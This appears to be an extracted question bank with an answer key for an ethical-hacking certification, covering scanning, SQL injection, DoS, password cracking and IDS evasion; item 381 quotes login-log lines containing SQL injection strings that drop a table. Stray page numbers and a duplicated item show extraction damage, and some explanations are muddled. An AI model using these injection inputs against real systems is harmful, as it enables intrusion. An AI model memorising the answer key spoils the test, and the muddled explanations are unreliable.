371 Say that "abigcompany.com" had a security vulnerability in the javascript on their website in the past. They recently fixed the security vulnerability, but it had been there for many months. Is there some way to 4go back and see the code for that error? Select the best answer. A. archive.org B. There is no way to get the changed webpage unless you contact someone at the company C. Usenet D. Javascript would not be in their html so a service like usenet or archive wouldn't help you

A (Explanation: Explanations: Archive.org is a website that periodically archives internet content. They have archives of websites over many years. It could be used to go back and look at the javascript as javascript would be in the HTML code. 221)

117 Paula works as the primary help desk contact for her company. Paula has just received a call from a user reporting that his computer just displayed a Blue Screen of Death screen and he ca no longer work. Paula walks over to the user's computer and sees the Blue Screen of Death screen. The user's computer is running Windows XP, but the Blue screen looks like a familiar one that Paula had seen a Windows 2000 Computers periodically. The user said he stepped away from his computer for only 15 minutes and when he got back, the Blue Screen was there. Paula also noticed that the hard drive activity light was flashing meaning that the computer was processing some thing. Paula knew this should not be the case since the computer should be completely frozen during a Blue screen. She checks the network IDS live log entries and notices numerous nmap scan alerts. What is Paula seeing happen on this computer? A. Paula's Network was scanned using FloppyScan B. Paula's Netwrok was scanned using Dumpsec C. There was IRQ conflict in Paula's PC D. Tool like Nessus will cause BSOD

A (Explanation: Floppyscan is a dangerous hacking tool which can be used to portscan a system using a floppy disk Bootsup mini Linux Displays Blue screen of death screen Port scans the network using NMAP Send the results by e-mail to a remote server.)

121 The FIN flag is set and sent from host A to host B when host A has no more data to transmit (Closing a TCP connection). This flag releases the connection resources. However, host A can continue to receive data as long as the SYN sequence number of transmitted packets from host B are lower than the packet segment containing the set FIN flag. A. True B. False 71

A (Explanation: For sequence number purposes, the SYN is considered to occur before the first actual data octet of the segment in which it occurs, while the FIN is considered to occur after the last actual data octet in a segment in which it occurs. So packets receiving out of order will still be accepted.)

345 What is Form Scalpel used for? A. Dissecting HTML Forms B. Dissecting SQL Forms C. Analysis of Access Database Forms D. Troubleshooting Netscape Navigator E. Quatro Pro Analysis Tool

A (Explanation: Form Scalpel automatically extracts forms from a given web page and splits up all fields for editing and manipulation. 207 - - - -)

39 Bob has been hired to perform a penetration test on ABC.com. He begins by looking at IP address ranges owned by the company and details of domain name registration. He then goes to News Groups and financial web sites to see if they are leaking any sensitive information of have any technical details online. Within the context of penetration testing methodology, what phase is Bob involved with? A. Passive information gathering B. Active information gathering C. Attack phase D. Vulnerability Mapping

A (Explanation: He is gathering information and as long as he doesn't make contact with any of the targets systems he is considered gathering this information in a passive mode.)

382 Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit. Choose the attack type from the choices given below. A. Database Fingerprinting B. Database Enumeration C. SQL Fingerprinting D. SQL Enumeration

A (Explanation: He is trying to create a view of the characteristics of the target database, he is taking it's fingerprints.)

47 What are twp types of ICMP code used when using the ping command? A. It uses types 0 and 8. B. It uses types 13 and 14. C. It uses types 15 and 17. D. The ping command does not use ICMP but uses UDP.

A (Explanation: ICMP Type 0 = Echo Reply, ICMP Type 8 = Echo)

301 Smurf is a simple attack based on IP spoofing and broadcasts. A single packet (such as an ICMP Echo Request) is sent as a directed broadcast to a subnet on the Internet. All the machines on that subnet respond to this broadcast. By spoofing the source IP Address of the packet, all the responses will get sent to the spoofed IP Address. Thus, a hacker can often flood a victim with hundreds of responses for every request the hacker sends out. Who are the primary victims of these attacks on the Internet today? A. IRC servers are the primary victim to smurf attacks B. IDS devices are the primary victim to smurf attacks C. Mail Servers are the primary victim to smurf attacks D. SPAM filters are the primary victim to surf attacks

A (Explanation: IRC servers are the primary victim to smurf attacks. Script-kiddies run programs that scan the Internet looking for "amplifiers" (i.e. subnets that will respond). They compile lists of these amplifiers and exchange them with their friends. Thus, when a victim is flooded with responses, they will appear to come from all over the Internet. On IRCs, hackers will use bots (automated programs) that connect to IRC servers and collect IP addresses. The bots then send the forged packets to the amplifiers to inundate the victim.)

84 You are manually conducting Idle Scanning using Hping2. During your scanning you notice that almost every query increments the IPID regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Why do you think this occurs? A. The zombie you are using is not truly idle. B. A stateful inspection firewall is resetting your queries. C. Hping2 cannot be used for idle scanning. D. These ports are actually open on the target system. 50

A (Explanation: If the IPID is incremented by more than the normal increment for this type of system it means that the system is interacting with some other system beside yours and has sent packets to an unknown host between the packets destined for you.)

472 Network Intrusion Detection systems can monitor traffic in real time on networks. Which one of the following techniques can be very effective at avoiding proper detection? A. Fragmentation of packets. B. Use of only TCP based protocols. C. Use of only UDP based protocols. D. Use of fragmented ICMP traffic only. 284

A (Explanation: If the default fragmentation reassembly timeout is set to higher on the client than on the IDS then the it is possible to send an attack in fragments that will never be reassembled in the IDS but they will be reassembled and read on the client computer acting victim.)

372 The GET method should never be used when sensitive data such as credit is being sent to a CGI program. This is because any GET command will appear in the URL and will be logged by any servers. For example, let's say that you've entered your credit card information into a form that uses the GET method. The URL may appear like this: https://www.xsecurity-bank.com/creditcard.asp?cardnumber=454543433532234 The GET method appends the credit card number to the URL. This means that anyone with access to a server log will be able to obtain this information. How would you protect from this type of attack? A. Replace the GET with POST method when sending data B. Never include sensitive information in a script C. Use HTTOS SSLV3 to send the data instead of plain HTTPS D. Encrypt the data before you send using GET method

A (Explanation: If the method is "get", the user agent takes the value of action, appends a ? to it, then appends the form data set, encoded using the application/x-www-form-urlencoded content type. The user agent then traverses the link to this URI. If the method is "post" --, the user agent conducts an HTTP post transaction using the value of the action attribute and a message created according to the content type specified by the enctype attribute.)

549 One of the most common and the best way of cracking RSA encryption is to being to derive the two prime numbers, which are used in the RSA PKI mathematical process. If the two numbers p and q are discovered through a _________________ process, then the private key can be derived. A. Factorization B. Prime Detection C. Hashing D. Brute-forcing

A (Explanation: In April 1994, an international cooperative group of mathematicians and computer scientists solved a 17-year-old challenge problem, the factoring of a 129-digit number, called RSA- 129, into two primes. That is, RSA-129 = 1143816257578888676692357799761466120102182 9672124236256256184293570693524573389783059 7123563958705058989075147599290026879543541 = 34905295108476509491478496199038 98133417764638493387843990820577 times 32769132993266709549961988190834 461413177642967992942539798288533. Se more at http://en.wikipedia.org/wiki/RSA_Factoring_Challenge)

554 One of the most common and the best way of cracking RSA encryption is to being to derive the two prime numbers, which are used in the RSA PKI mathematical process. If the two numbers p and q are discovered through a _________________ process, then the private key can be derived. A. Factorization B. Prime Detection C. Hashing D. Brute-forcing

A (Explanation: In April 1994, an international cooperative group of mathematicians and computer scientists solved a 17-year-old challenge problem, the factoring of a 129-digit number, called RSA- 129, into two primes. That is, RSA-129 = 1143816257578888676692357799761466120102182 9672124236256256184293570693524573389783059 7123563958705058989075147599290026879543541 = 34905295108476509491478496199038 98133417764638493387843990820577 times 32769132993266709549961988190834 461413177642967992942539798288533. Se more at http://en.wikipedia.org/wiki/RSA_Factoring_Challenge)

115 Lori has just been tasked by her supervisor conduct vulnerability scan on the corporate network. She has been instructed to perform a very thorough test of the network to ensure that there are no security holes on any of the machines. Lori's company does not own any commercial scanning products, so she decides to download a free one off the Internet. Lori has never done a vulnerability scan before, so she is unsure of some of the settings available in the software she downloaded. One of the option is to choose which ports that can be scanned. Lori wants to do exactly what her boos has told her, but she does not know ports should be scanned. If Lori is supposed to scan all known TCP ports, how many ports should she select in the software? A. 65536 B. 1024 C. 1025 D. Lori should not scan TCP ports, only UDP ports

A (Explanation: In both TCP and UDP, each packet header will specify a source port and a destination port, each of which is a 16-bit unsigned integer (i.e. ranging from 0 to 65535).)

292 You have been called to investigate a sudden increase in network traffic at company. It seems that the traffic generated was too heavy that normal business functions could no longer be rendered to external employees and clients. After a quick investigation, you find that the computer has services running attached to TFN2k and Trinoo software. What do 175 you think was the most likely cause behind this sudden increase in traffic? A. A distributed denial of service attack. B. A network card that was jabbering. C. A bad route on the firewall. D. Invalid rules entry at the gateway.

A (Explanation: In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB). TFN2K and Trinoo are tools used for conducting DDos attacks.)

485 What type of attack changes its signature and/or payload to avoid detection by antivirus programs? A. Polymorphic B. Rootkit 292 C. Boot sector D. File infecting

A (Explanation: In computer terminology, polymorphic code is code that mutates while keeping the original algorithm intact. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence.)

31 Bill has started to notice some slowness on his network when trying to update his company's website while trying to access the website from the Internet. Bill asks the help desk manager if he has received any calls about slowness from the end users, but the help desk manager says that he has not. Bill receives a number of calls from customers that can't access the company website and can't purchase anything online. Bill logs on to a couple of this routers and notices that the logs shows network traffic is at all time high. He also notices that almost all the traffic is originating from a specific address. Bill decides to use Geotrace to find out where the suspect IP is originates from. The Geotrace utility runs a traceroute and finds that IP is coming from Panama. Bill knows that none of his customers are in Panama so he immediately thinks that his company is under a Denial of Service attack. Now Bill needs to find out more about the originating IP Address. What Internet registry should Bill look in to find the IP Address? A. LACNIC B. ARIN C. RIPELACNIC D. APNIC

A (Explanation: LACNIC is the Latin American and Caribbean Internet Addresses Registry that administers IP addresses, autonomous system numbers, reverse DNS, and other network resources for that region.)

237 John wishes to install a new application onto his Windows 2000 server. He wants to ensure that any application he uses has not been Trojaned. What can he do to help ensure this? A. Compare the file's MD5 signature with the one published on the distribution media B. Obtain the application via SSL C. Compare the file's virus signature with the one published on the distribution media D. Obtain the application from a CD-ROM disc

A (Explanation: MD5 was developed by Professor Ronald L. Rivest of MIT. What it does, to quote the executive summary of rfc1321, is: [The MD5 algorithm] takes as input a message of arbitrary length and produces as output a 128- bit "fingerprint" or "message digest" of the input. It is conjectured that it is computationally infeasible to produce two messages having the same message digest, or to produce any message having a given prespecified target message digest. The MD5 algorithm is intended for digital signature applications, where a large file must be "compressed" in a secure manner before being 142 encrypted with a private (secret) key under a public-key cryptosystem such as RSA. In essence, MD5 is a way to verify data integrity, and is much more reliable than checksum and many other commonly used methods.)

113 66 John has performed a scan of the web server with NMAP but did not gather enough information to accurately identify which operating system is running on the remote host. How could you use a web server to help in identifying the OS that is being used? A. Telnet to an Open port and grab the banner B. Connect to the web server with an FTP client C. Connect to the web server with a browser and look at the web page D. Telnet to port 8080 on the web server and look at the default page code

A (Explanation: Most Web servers politely identify themselves and the OS to anyone who asks.)

299 Hackers usually control Bots through: A. IRC Channel B. MSN Messenger C. Trojan Client Software D. Yahoo Chat E. GoogleTalk

A (Explanation: Most of the bots out today has a function to connect to a predetermined IRC channel in order to get orders.)

569 If you perform a port scan with a TCP ACK packet, what should an OPEN port return? A. RST B. No Reply C. SYN/ACK D. FIN

A (Explanation: Open ports return RST to an ACK scan.)

551 Richard is a network Administrator working at a student loan company in lowa. This company processes over 20,000 students loan a year from colleges all over the state. Most communication between the company, schools and lenders is carried out through email. Because of privacy laws that are in the process of being implemented, Richard wants to get ahead of the game and become compliant before any sort of auditing occurs. Much of the email communication used at his company contains sensitive information such as social security numbers. For this reason, Richard wants to utilize email encryption agency-wide. The only problem for Richard is that his department only has couple of servers and they are utilized to their full capacity. Since a server-based PKI is not an option for him, he is looking for a low/no cost solution to encrypt email. What should Richard use? A. PGP B. RSA C. 3DES D. OTP

A (Explanation: PGP (Pretty Good Privacy) is an encryption program being used for secure transmission of files and e-mails. This adapts public-key encryption technology in which pairs of keys are used to maintain secure communication. For PGP-based communication both the sender and receiver should have public and private key pairs. The sender's public key should be distributed to the receiver. Similarly, the receiver's public key should be distributed to the sender. When sending a message or a file, the sender can sign using his private key. Also, the sender's private key is never distributed. All encryption is made on the workstation sending the e-mail. 335)

535 Which programming language is NOT vulnerable to buffer overflow attacks? 326 A. Java B. ActiveX C. C++ D. Assembly Language

A (Explanation: Perl and Java has boundary checking, hence buffer overflows don't occur. On the other hand, Perl and Java don't offer access to the system that is as deep as some programs need. Topic 21, Cryptography)

314 188 Study the following e-mail message. When the link in the message is clicked, it will take you to an address like: http://hacker.xsecurity.com/in.htm. Note that hacker.xsecurity.com is not an official SuperShopper site! What attack is depicted in the below e-mail? Dear SuperShopper valued member, Due to concerns, for the safety and integrity of the SuperShopper community we have issued this warning message. It has come to our attention that your account information needs to be updated due to inactive members, frauds and spoof reports. If you could please take 5-10 minutes out of your online experience and renew your records you will not run into any future problems with the online service. However, failure to update your records will result to your account cancellation. This notification expires within 24 hours. Once you have updated your account records your SuperShopper will not be interrupted and will continue as normal. Please follow the link below and renew your account information. https://www.supershopper.com/cgi-bin/webscr?cmd=update-run SuperShopper Technical Support http://www.supershopper.com A. Phishing attack B. E-mail spoofing C. social engineering D. Man in the middle attack

A (Explanation: Phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out using email or an instant message, although phone contact has been used as well. 189)

116 Samantha has been actively scanning the client network for which she is doing a vulnerability assessment test. While doing a port scan she notices ports open in the 135 to 139 range. What protocol is most likely to be listening on those ports? A. SMB B. FTP C. SAMBA D. FINGER 68

A (Explanation: Port 135 is for RPC and 136-139 is for NetBIOS traffic. SMB is an upper layer service that runs on top of the Session Service and the Datagram service of NetBIOS.)

466 Carl has successfully compromised a web server from behind a firewall by exploiting a vulnerability in the web server program. He wants to proceed by installing a backdoor program. However, he is aware that not all inbound ports on the firewall are in the open state. From the list given below, identify the port that is most likely to be open and allowed to reach the server that Carl has just compromised. A. 53 B. 110 C. 25 D. 69

A (Explanation: Port 53 is used by DNS and is almost always open, the problem is often that the port is opened for the hole world and not only for outside DNS servers. 280)

305 What is the most common vehicle for social engineering attacks? 183 A. Phone B. Email C. In person D. P2P Networks

A (Explanation: Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.)

423 Virus Scrubbers and other malware detection program can only detect items that they are aware of. Which of the following tools would allow you to detect unauthorized changes or modifications of binary files on your system by unknown malware? A. System integrity verification tools B. Anti-Virus Software C. A properly configured gateway D. There is no way of finding out until a new updated signature file is released

A (Explanation: Programs like Tripwire aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner.)

226 Michael is the security administrator for the for ABC company. Michael has been charged with strengthening the company's security policies, including its password policies. Due to certain legacy applications. Michael was only able to enforce a password group policy in Active Directory with a minimum of 10 characters. He has informed the company's employes, however that the new password policy requires that everyone must have complex passwords with at least 14 characters. Michael wants to ensure that everyone is using complex passwords that meet the new security policy requirements. Michael has just logged on to one of the network's domain controllers and is about to run the following command: What will this command accomplish? A. Dumps SAM password hashes to pwd.txt B. Password history file is piped to pwd.txt C. Dumps Active Directory password hashes to pwd.txt D. Internet cache file is piped to pwd.txt

A (Explanation: Pwdump is a hack tool that is used to grab Windows password hashes from a remote Windows computer. Pwdump > pwd.txt will redirect the output from pwdump to a text file named pwd.txt 136)

245 William has received a Tetris game from someone in his computer programming class through email. William does not really know the person who sent the game very well, but decides to install the game anyway because he really likes Tetris. After William installs the game, he plays it for a couple of hours. The next day, William plays the Tetris game again and notices that his machines have begun to slow down. He brings up his Task Manager and sees the following programs running (see Screenshot): What has William just installed? 147 A. Remote Access Trojan (RAT) B. Zombie Zapper (ZoZ) C. Bot IRC Tunnel (BIT) D. Root Digger (RD)

A (Explanation: RATs are malicious programs that run invisibly on host PCs and permit an intruder remote access and control. On a basic level, many RATs mimic the functionality of legitimate remote control programs such as Symantec's pcAnywhere but are designed specifically for stealth installation and operation. Intruders usually hide these Trojan horses in games and other small programs that unsuspecting users then execute on their PCs. Typically, exploited users either download and execute the malicious programs or are tricked into clicking rogue email 148 attachments.)

379 Johnny is a member of the hacking group orpheus1. He is currently working on breaking into the Department of Defense's front end exchange server. He was able to get into the server, located in a DMZ, by using an unused service account that had a very weak password that he was able to guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack it. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password. What tool would be best used to accomplish this? A. RainbowCrack B. SMBCrack C. SmurfCrack D. PSCrack

A (Explanation: RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called "rainbow table". It does take a long time to precompute the tables. But once the one time precomputation is finished, a time-memory trade-off cracker can be hundreds of times faster than a brute force cracker, with the help of precomputed tables. Topic 14, SQL Injection)

475 Snort is an open source Intrusion Detection system. However, it can also be used for a few other purposes as well. Which of the choices below indicate the other features offered by Snort? A. IDS, Packet Logger, Sniffer B. IDS, Firewall, Sniffer C. IDS, Sniffer, Proxy D. IDS, Sniffer, content inspector

A (Explanation: Snort is a free software network intrusion detection and prevention system capable 286 of performing packet logging & real-time traffic analysis, on IP networks. Snort was written by Martin Roesch but is now owned and developed by Sourcefire)

122 Which type of scan does not open a full TCP connection? A. Stealth Scan B. XMAS Scan C. Null Scan D. FIN Scan

A (Explanation: Stealth Scan: Instead of completing the full TCP three-way-handshake a full connection is not made. A SYN packet is sent to the system and if a SYN/ACK packet is received it is assumed that the port on the system is active. In that case a RST/ACK will be sent which will determined the listening state the system is in. If a RST/ACK packet is received, it is assumed that the port on the system is not active.)

175 SNMP is a connectionless protocol that uses UDP instead of TCP packets? (True or False) A. True B. False

A (Explanation: TCP and UDP provide transport services. But UDP was preferred. This is due to TCP characteristics, it is a complicate protocol and it consume to many memory and CPU resources. Where as UDP is easy to build and run. Into devices (repeaters and modems) vendors have built simple version of IP and UDP. 105)

10 Which of the following act in the united states specifically criminalizes the transmission of unsolicited commercial e-mail(SPAM) without an existing business relationship. A. 2004 CANSPAM Act B. 2003 SPAM Preventing Act C. 2005 US-SPAM 1030 Act D. 1990 Computer Misuse Act

A (Explanation: The CAN-SPAM Act of 2003 (Controlling the Assault of Non-Solicited Pornography and Marketing Act) establishes requirements for those who send commercial email, spells out 6 penalties for spammers and companies whose products are advertised in spam if they violate the law, and gives consumers the right to ask emailers to stop spamming them. The law, which became effective January 1, 2004, covers email whose primary purpose is advertising or promoting a commercial product or service, including content on a Web site. A "transactional or relationship message" - email that facilitates an agreed-upon transaction or updates a customer in an existing business relationship - may not contain false or misleading routing information, but otherwise is exempt from most provisions of the CAN-SPAM Act.)

160 What does FIN in TCP flag define? 94 A. Used to close a TCP connection B. Used to abort a TCP connection abruptly C. Used to indicate the beginning of a TCP connection D. Used to acknowledge receipt of a previous packet or transmission

A (Explanation: The FIN flag stands for the word FINished. This flag is used to tear down the virtual connections created using the previous flag (SYN), so because of this reason, the FIN flag always appears when the last packets are exchanged between a connection.)

125 Which of the following is a patch management utility that scans one or more computers on your network and alerts you if you important Microsoft Security patches are missing. It then provides links that enable those missing patches to be downloaded and installed. A. MBSA B. BSSA C. ASNB D. PMUS

A (Explanation: The Microsoft Baseline Security Analyzer (MBSA) is a tool put out by Microsoft to help analyze security problems in Microsoft Windows. It does this by scanning the system for security problems in Windows, Windows components such as the IIS web server application, Microsoft SQL Server, and Microsoft Office. One example of an issue might be that permissions for one of the directories in the wwwroot folder of IIS could be set at too low a level, allowing unwanted modification of files from outsiders.)

176 Maurine is working as a security consultant for Hinklemeir Associate. She has asked the Systems Administrator to create a group policy that would not allow null sessions on the network. The Systems Administrator is fresh out of college and has never heard of null sessions and does not know what they are used for. Maurine is trying to explain to the Systems Administrator that hackers will try to create a null session when footprinting the network. Why would an attacker try to create a null session with a computer on a network? A. Enumerate users shares B. Install a backdoor for later attacks C. Escalate his/her privileges on the target server D. To create a user with administrative privileges for later use

A (Explanation: The Null Session is often referred to as the "Holy Grail" of Windows hacking. Listed as the number 5 windows vulnerability on the SANS/FBI Top 20 list, Null Sessions take advantage of flaws in the CIFS/SMB (Common Internet File System/Server Messaging Block) architecture. You can establish a Null Session with a Windows (NT/2000/XP) host by logging on with a null user name and password. Using these null connections allows you to gather the following information from the host: - List of users and groups - List of machines - List of shares - Users and host SID' (Security Identifiers) Topic 5, System Hacking)

139 One of your team members has asked you to analyze the following SOA record. What is the version? Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400. A. 200303028 B. 3600 C. 604800 D. 2400 E. 60 F. 4800

A (Explanation: The SOA starts with the format of YYYYMMDDVV where VV is the version.)

223 You are the IT Manager of a large legal firm in California. Your firm represents many important clients whose names always must remain anonymous to the public. Your boss, Mr. Smith is always concerned about client information being leaked or revealed to the pres or public. You have just finished a complete security overhaul of your information system including an updated IPS, new firewall, email encryption and employee security awareness training. Unfortunately, many of your firm's clients do not trust technology to completely secure their information, so couriers routinely have to travel back and forth to and from the 133 office with sensitive information. Your boss has charged you with figuring out how to secure the information the couriers must transport. You propose that the data be transferred using burned CD's or USB flash drives. You initially think of encrypting the files, but decide against that method for fear the encryption keys could eventually be broken. What software application could you use to hide the data on the CD's and USB flash drives? A. Snow B. File Snuff C. File Sneaker D. EFS

A (Explanation: The Snow software developed by Matthew Kwan will insert extra spaces at the end of each line. Three bits are encoded in each line by adding between 0 and 7 spaces that are ignored by most display programs including web browsers.)

517 This IDS defeating technique works by splitting a datagram (or packet) into multiple fragments and the IDS will not spot the true nature of the fully assembled datagram. The datagram is not reassembled until it reaches its final destination. It would be a processorintensive tasks for an IDS to reassemble all fragments itself and on a busy system the packet will slip through the IDS onto the network. What is this technique called? A. IP Fragmentation or Session Splicing B. IP Routing or Packet Dropping C. IDS Spoofing or Session Assembly D. IP Splicing or Packet Reassembly

A (Explanation: The basic premise behind session splicing, or IP Fragmentation, is to deliver the payload over multiple packets thus defeating simple pattern matching without session reconstruction. This payload can be delivered in many different manners and even spread out over a long period of time. Currently, Whisker and Nessus have session splicing capabilities, and other tools exist in the wild. 314)

289 When working with Windows systems, what is the RID of the true administrator account? A. 500 B. 501 C. 512 D. 1001 E. 1024 F. 1000

A (Explanation: The built-in administrator account always has a RID of 500.)

507 Exhibit: 307 Given the following extract from the snort log on a honeypot, what service is being exploited? : A. FTP B. SSH C. Telnet D. SMTP

A (Explanation: The connection is done to 172.16.1.104:21.)

407 In order to attack a wireless network, you put up an access point and override the signal of the real access point. As users send authentication data, you are able to capture it. What kind of attack is this? A. Rouge access point attack B. Unauthorized access point attack C. War Chalking D. WEP attack

A (Explanation: The definition of a Rogue access point is:1. A wireless access point (AP) installed by an employee without the consent of the IT department. Without the proper security configuration, users have exposed their company's network to the outside world.2. An access point (AP) set up by an attacker outside a facility with a wireless network. Also called an "evil twin," the rogue AP picks up beacons (signals that advertise its presence) from the company's legitimate AP and transmits identical beacons, which some client machines inside the building associate with. 244)

381 Bank of Timbuktu was a medium-sized, regional financial institution in Timbuktu. The bank has deployed a new Internet-accessible Web application recently, using which customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser. John Stevens was in charge of information security at Bank of Timbuktu. After one month in production, several customers complained about the Internet enabled banking application. Strangely, the account balances of many bank's customers has been changed! 227 However, money hadn't been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries: Attempted login of unknown user: John Attempted login of unknown user: sysaR Attempted login of unknown user: sencat Attempted login of unknown user: pete ''; Attempted login of unknown user: ' or 1=1-- Attempted login of unknown user: '; drop table logins-- Login of user jason, sessionID= 0x75627578626F6F6B Login of user daniel, sessionID= 0x98627579539E13BE Login of user rebecca, sessionID= 0x90627579944CCB811 Login of user mike, sessionID= 0x9062757935FB5C64 Transfer Funds user jason Pay Bill user mike Logout of user mike What kind of attack did the Hacker attempt to carry out at the bank? (Choose the best answer) A. The Hacker attempted SQL Injection technique to gain access to a valid bank login ID. B. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session. C. The Hacker attempted a brute force attack to guess login ID and password using password cracking tools. D. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability.

A (Explanation: The following part: Attempted login of unknown user: pete ''; Attempted login of unknown user: ' or 1=1-- Attempted login of unknown user: '; drop table logins-- 228 Clearly shows a hacker trying to perform a SQL injection by bypassing the login with the statement 1=1 and then dumping the logins table.)

532 When writing shellcodes, you must avoid _________________ because these will end the string. 324 A. Null Bytes B. Root Bytes C. Char Bytes D. Unicode Bytes

A (Explanation: The null character (also null terminator) is a character with the value zero, present in the ASCII and Unicode character sets, and available in nearly all mainstream programming languages. The original meaning of this character was like NOP — when sent to a printer or a terminal, it does nothing (some terminals, however, incorrectly display it as space). Strings ending in a null character are said to be null-terminated.)

209 Which of the following steganography utilities exploits the nature of white space and allows the user to conceal information in these white spaces? A. Snow B. Gif-It-Up C. NiceText D. Image Hide

A (Explanation: The program snow is used to conceal messages in ASCII text by appending whitespace to the end of lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. And if the built-in encryption is used, the message cannot be read even if it is detected.)

34 You are footprinting the www.xsecurity.com domain using the Google Search Engine. You would like to determine what sites link to www.xsecurity .com at the first level of revelance. Which of the following operator in Google search will you use to achieve this? A. Link: www.xsecurity.com 21 B. serch?l:www.xsecurity.com C. level1.www.security.com D. pagerank:www.xsecurity.com

A (Explanation: The query [link:] will list webpages that have links to the specified webpage. For instance, [link:www.google.com] will list webpages that have links pointing to the Google homepage. Note there can be no space between the "link:" and the web page url. Topic 3, Scanning)

285 Clive has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply packets that are being received on the external gateway interface. Further inspection reveals that they are not responses from the internal hosts' requests but simply responses coming from the Internet. What could be the most likely cause? A. Someone has spoofed Clive's IP address while doing a smurf attack. B. Someone has spoofed Clive's IP address while doing a land attack. C. Someone has spoofed Clive's IP address while doing a fraggle attack. D. Someone has spoofed Clive's IP address while doing a DoS attack.

A (Explanation: The smurf attack, named after its exploit program, is a denial-of-service attack that uses spoofed broadcast ping messages to flood a target system. In such an attack, a perpetrator sends a large amount of ICMP echo (ping) traffic to IP broadcast addresses, all of it having a spoofed source address of the intended victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, hundreds of machines might reply to each packet.)

127 While reviewing the results of a scan run against a target network you come across the following: What was used to obtain this output? A. An SNMP Walk B. Hping2 diagnosis C. A Bo2K System query D. Nmap protocol/port scan 75

A (Explanation: The snmpwalk command is designed to perform a sequence of chained GETNEXT requests automatically, rather than having to issue the necessary snmpgetnext requests by hand. The command takes a single OID, and will display a list of all the results which lie within the subtree rooted on this OID.)

331 After a client sends a connection request (SYN) packet to the server, the server will respond (SYN-ACK) with a sequence number of its choosing, which then must be acknowledge (ACK) by the client. This sequence number is predictable; the attack connects to a service first with its own IP address, records the sequence number chosen and then opens a second connection from a forget IP address. The attack doesn't see the SYN-ACK (or any other packet) from the server, but can guess the correct responses. If the source IP Address is used for authentication, the attacker can use the one-side communication to break into the server. What attacks can you successfully launch against a server using the above technique? A. Session Hijacking attacks B. Denial of Service attacks C. Web Page defacement attacks D. IP Spoofing Attacks

A (Explanation: The term Session Hijacking refers to the exploitation of a valid computer session - sometimes also called a session key - to gain unauthorised access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer. Topic 11, Hacking Web Servers)

4 What is "Hacktivism"? A. Hacking for a cause B. Hacking ruthlessly C. An association which groups activists D. None of the above

A (Explanation: The term was coined by author/critic Jason Logan King Sack in an article about media artist Shu Lea Cheang. Acts of hacktivism are carried out in the belief that proper use of code will have leveraged effects similar to regular activism or civil disobedience.)

128 Which of the following nmap command in Linux procedures the above output? A. sudo nmap -sP 192.168.0.1/24 B. root nmap -sA 192.168.0.1/24 C. run nmap -TX 192.168.0.1/24 D. launch nmap -PP 192.168.0.1/24

A (Explanation: This is an output from a ping scan. The option -sP will give you a ping scan of the 76 192.168.0.1/24 network. Topic 4, Enumeration)

77 Which of the following Nmap commands would be used to perform a stack fingerprinting? A. Nmap -O -p80 <host(s.> B. Nmap -hU -Q<host(s.> C. Nmap -sT -p <host(s.> D. Nmap -u -o -w2 <host> E. Nmap -sS -0p target

A (Explanation: This option activates remote host identification via TCP/IP fingerprinting. In other words, it uses a bunch of techniques to detect subtlety in the underlying operating system network stack of the computers you are scanning. It uses this information to create a "fingerprint" which it compares with its database of known OS fingerprints (the nmap-os-fingerprints file. to decide what type of system you are scanning.)

434 What does the this symbol mean? 259 A. Open Access Point B. WPA Encrypted Access Point C. WEP Encrypted Access Point D. Closed Access Point

A (Explanation: This symbol is a "warchalking" symbol for a open node (open circle) with the SSID tsunami and the bandwidth 2.0 Mb/s)

132 78 Jess the hacker runs L0phtCrack's built-in sniffer utility which grabs SMB password hashes and stores them for offline cracking. Once cracked, these passwords can provide easy access to whatever network resources the user account has access to. But Jess is not picking up hashed from the network. Why? A. The network protocol is configured to use SMB Signing. B. The physical network wire is on fibre optic cable. C. The network protocol is configured to use IPSEC. D. L0phtCrack SMB filtering only works through Switches and not Hubs.

A (Explanation: To protect against SMB session hijacking, NT supports a cryptographic integrity mechanism, SMB Signing, to prevent active network taps from interjecting themselves into an already established session.)

